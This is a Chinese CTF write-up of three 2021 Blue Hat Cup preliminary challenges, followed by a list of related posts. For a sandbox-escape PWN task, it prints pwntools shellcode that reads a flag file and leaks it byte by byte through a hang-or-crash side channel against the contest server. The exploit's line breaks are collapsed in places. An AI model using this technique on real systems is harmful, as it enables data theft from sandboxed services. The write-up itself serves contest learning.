前言

本次蓝帽杯初赛做出了三道解出人数最多的题，勉强混个线下。但不得不吐槽一下这届题目。冬奥会这题杂项套了100层娃，头都绕晕了；PWN题的slient是2020年蓝帽杯决赛原题。其他题没做出来，没有发言权。

WEB

Ball_sigin

签到题，用手机打开，填补3次左上角空缺的单词，完成滑雪游戏即得到flag

flag{3b2e48de-e328-4267-a8d6-8d17fb3c8889}

PWN

slient

题目mmap出了一块可执行内存，地址位于0x10000，随后读取shellcode到这块内存上并执行，在执行前使用seccomp禁掉了除去open/write之外的其他所有系统调用，因此无法通过write系统调用直接leak出flag。考虑单字节爆破flag，即读取flag到一块内存区域，随后单字节爆破，在shellcode中设置loop循环，一旦cmp命中即跳转到loop使得程序卡死，否则执行后面的exit系统调用直接崩溃，根据程序的表现可以区分是否命中，注意因为服务器通信不稳定，每次读到一段flag就更新exp中的flag字符串继续向后爆破。

#coding=utf-8
from pwn import *r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)context.update(arch='amd64',os='linux',log_level='info')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./chall')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]map_addr = 0x00010000
flag_addr = 0x10700def exp(dis,char):p.recvuntil("Welcome to silent execution-box.\n")sc = asm('''mov r12,0x67616c66push r12mov rdi,rspxor esi,esixor edx,edxmov al,2syscallmov rdi,raxmov rsi,0x10700mov dl,0x40xor rax,raxsyscallmov dl, byte ptr [rsi+{}]mov cl, {}cmp cl,dljz loopmov al,60syscallloop:jmp loop'''.format(dis,char))p.send(sc)#p.interactive()#exp(0,84)flag = "flag{k33p_qu14t!}"
for i in range(len(flag),18):sleep(1)log.success("flag : {}".format(flag))for j in range(0x100):if debug:p = process('./chall')else:p = remote('8.140.177.7',40334)try:#gdb.attach(p,'b* 0x0000555555554000+0xc94')exp(i,j)p.recvline(timeout=1)flag += chr(j)p.send('\n')log.success("{} pos : {} success".format(i,chr(j)))#sleep(0.5)#raw_input()p.close()breakexcept:#log.success("{} pos : {} failed ".format(i,chr(j)))p.close()

flag{k33p_qu14t!}

MISC

冬奥会_is_coming

题目拿到手为一张png图片

binwalk分离得到一个压缩包

解压得encode.mp3，还有提示密码为8位

查看mp3文件内容，发现最后有一段多出来的cipher，将十六进制分离出来转换得到emoji暂且不清楚有什么用，猜测为emoji加密，解密emoji发现内容无意义

题目名称为冬奥会，猜想8位密码为冬奥会开幕日期20220204，使用mp3stego工具分离出一个文本txt

十六进制转换字符串得到如下为office里的wingding字体：

在https://lingojam.com/WingDing转换为字符串：

找到github上该项目，下载post-chekout文件

文件内容如下：

将内容How_6ad_c0uld_a_1cePeak_be?作为密钥结合之前的emoji，尝试emoji-aes解密（https://aghorler.github.io/emoji-aes/），得到flag

flag{e32f619b-dbcd-49bd-9126-5d841aa01767}

2021第五届蓝帽杯初赛部分题目wp相关推荐

第五届蓝帽杯初赛：冬奥会_is_coming
运气好,这次蓝帽杯比赛,做出了这题,就能进半决赛了,这题实在是很套娃,我都怀疑是不是我套宝出的题目了. 题目是究极套娃题打开文件存在冰墩墩图片. 把图片放入010edito里面,发现有编码,一个rar ...
第五届蓝帽杯初赛 misc 赛后复现
挺可惜的,比赛当天正好是我这个月事情最多的一天,一共也就不到30分钟做题时间,那个图片题差一点就出来了- 说到底还是自己太菜了,下次好好努力题目附件我打包了一份: 链接:https://pan.ba ...
第五届蓝帽杯初赛：I_will_but_not_quite
很遗憾这题比赛的时候没做出来因为取证题确实不太会,之前没有接触过. 所以觉得很难得有取证题,就来尝试复现一下. 这题取证题,里面还套了一个密码学的题目,恶心. 由于没做过取证题,先要安装一个volat ...
2022蓝帽杯初赛电子取证
手机取证 1. 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?[答案格式:19201080] 360360 直接搜索-表格视图 2. 姜总的快递单号 ...
【2021 第五届“达观杯” 基于大规模预训练模型的风险事件标签识别】1 初赛Rank12的总结与分析
目录相关链接 1 赛题分析 2 引言 3 方案 3.1 传统DL方案 3.2 预训练方案 4 提分技巧 5 加快训练 6 总结和反思 7 参考资料相关链接 [2021 第五届"达观杯&q ...
2021 第五届“达观杯” 基于大规模预训练模型的风险事件标签识别】3 Bert和Nezha方案
目录相关链接 1 引言 2 NEZHA方案 2.1 预训练 2.2 微调 3 Bert 方案 3.1 预训练 3.2 微调 3 模型融合和TTA测试集数据增强 4 总结和反思 5 参考资料相关链接 ...
2019年第五届美亚杯电子取证团体赛 wp
2019年第五届美亚杯电子取证团体赛 wp 案情路由器 Win1.E01 Win3.E01 L:\Group_Competition\Hacker_Linux\Linux1 MacBookAir ...
2022蓝帽杯初赛wp
文章目录 Misc domainhacker domainhacker2 电子取证手机取证_1 手机取证_2 计算机取证_1 计算机取证_2 计算机取证_3 计算机取证_4 程序分析_1 程序分析_ ...
2022强国杯初赛部分题目
目录 Misc Welcome_to_QGB Misc 大佬大佬 Misc 找找 GIF Misc The fun picture Web upload_lol Misc Welcome_to_QGB ...

2021第五届蓝帽杯初赛部分题目wp

文章目录

前言

WEB

Ball_sigin

PWN

slient

MISC

冬奥会_is_coming

2021第五届蓝帽杯初赛部分题目wp相关推荐

最新文章

热门文章